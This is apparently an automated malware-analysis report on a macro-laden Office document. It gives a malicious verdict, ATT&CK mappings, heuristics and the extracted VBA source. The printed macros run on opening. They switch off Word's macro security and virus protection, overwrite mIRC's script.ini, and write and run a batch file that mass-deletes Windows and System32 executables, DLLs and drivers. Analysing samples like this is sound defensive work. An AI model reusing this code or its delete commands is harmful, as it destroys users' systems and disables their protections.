Verdict: MALICIOUS
Risk Score: 320

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
This Office document contains VBA macros that execute automatically upon opening, as indicated by the Document_Open heuristic. The macros attempt to disable security features and write a file named 'peak.txt' to C:\WINDOWS\. The presence of Shell() calls and CreateObject suggests the execution of arbitrary code, likely to download and run a secondary payload. The ClamAV detection of 'Win.Trojan.Delwin-33' further supports its malicious nature.
Heuristics (6)

- ClamAV: Win.Trojan.Delwin-33 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Delwin-33
- VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | Detection | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2945 bytes | 1807d7c36d97af1993d032019df6ddfa9e07ead9068063b340a1a2e4a49cb881 | ClamAV: Win.Trojan.DelFil-7 | unlikely |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub Document_Open()
    On Error Resume Next
    Open "C:\WINDOWS\peak.txt" For Output As #1
    Print #1, "Peak"
    Close #1
    MsgBox "hi welcome to new virus peak"
End Sub
Sub Stealth()
    Set fs = Application.FileSearch
    es$ = "xdez.txt"
    With fs
        .LookIn = "C:\Program Files"
        .SearchSubFolders = True
        .FileName = es$
        If .Execute > 0 Then
            MsgBox "File Found"
            Set ds = CreateObject("Scripting.FileSystemObject")
            Object
            Set fy = ds.GetFile(es$)
            h = (fy.Path)
            SetAttr h, vbNormal
            Kill (h)
            MsgBox "whats hapeening"
        Else
            MsgBox "del del del"
        End If
    End With
End Sub
Sub Document_Open()
    CommandBars("Macro").Controls("Security...").Enabled = 0
    CommandBars("Macro").Controls("Macros...").Enabled = 0
    CommandBars("Tools").Controls("Customize...").Enabled = 0
    CommandBars("View").Controls("Toolbars").Enabled = 0
    CommandBars("View").Controls("Status Bar").Enabled = 0
    CommandBars("Tools").Controls("Templates and Add-Ins...").Enabled = 0
    CommandBars("Format").Controls("Style...").Enabled = 0
    Application.ScreenUpdating = False
    Application.DisplayStatusBar = False
    Application.DisplayAlerts = False
    Options.VirusProtection = False
End Sub
Sub InfectMirc()
    infe$ = "c:\mirc\script.ini"
    Set fs = CreateObject("Scripting.FileSystemObject")
    If fs.FileExists(infe$) Then GoTo mircwrite Else GoTo fling
mircwrite:
    Open "c:\mirc\script.ini" For Output As #1
    Print #1, "[Script]"
    Print #1, "n0;Miniscript"
    Print #1, "n1= ON 1:JOIN:#:{ /exit } "
    Print #1, "n2= ON 1:*xde*:#:{ /exit };"
    Close #1
    SetAttr "c:\mirc\script.ini", vbReadOnly
    GoTo finish
fling:
    MsgBox "Invalid Memory Space", vbCritical
finish:
End Sub
Private Sub Form_Load()
    On Error Resume Next
    Open "C:\WINDOWS\peak2.txt" For Output As #1
    Print #1, "@echo off"
    Print #1, "cls"
    Print #1, "@del C:\windows\*.ini"
    Print #1, "cls"
    Print #1, "@del C:\windows\*.log"
    Print #1, "cls"
    Print #1, "@del C:\windows\*.exe"
    Print #1, "cls"
    Print #1, "@del C:\windows\*.com"
    Print #1, "cls"
    Print #1, "@del C:\windows\system32\*.scr"
    Print #1, "cls"
    Print #1, "@del C:\windows\SYSTEM32\*.exe"
    Print #1, "cls"
    Print #1, "@del C:\windows\system32\*.log"
    Print #1, "cls"
    Print #1, "@del C:\windows\SYSTEM32\*.drv"
    Print #1, "cls"
    Print #1, "@del C:\windows\system32\*.dll"
    Print #1, "cls"
    Print #1, "@del C:\windows\SYSTEM32\*.sys"
    Print #1, "cls"
    Print #1, "@del C:\windows\SYSTEM32\*.com"
    Print #1, "cls"
    Print #1, "@del C:\windows\system.ini"
    Close #1
    Name "C:\WINDOWS\peak2.txt" As "C:\WINDOWS\peak2.bat"
    Shell "C:\WINDOWS\peak2.bat"
    MsgBox "ur pc is gone", vbCritical
    Kill "C:\WINDOWS\peak2.bat"
    End
End Sub
```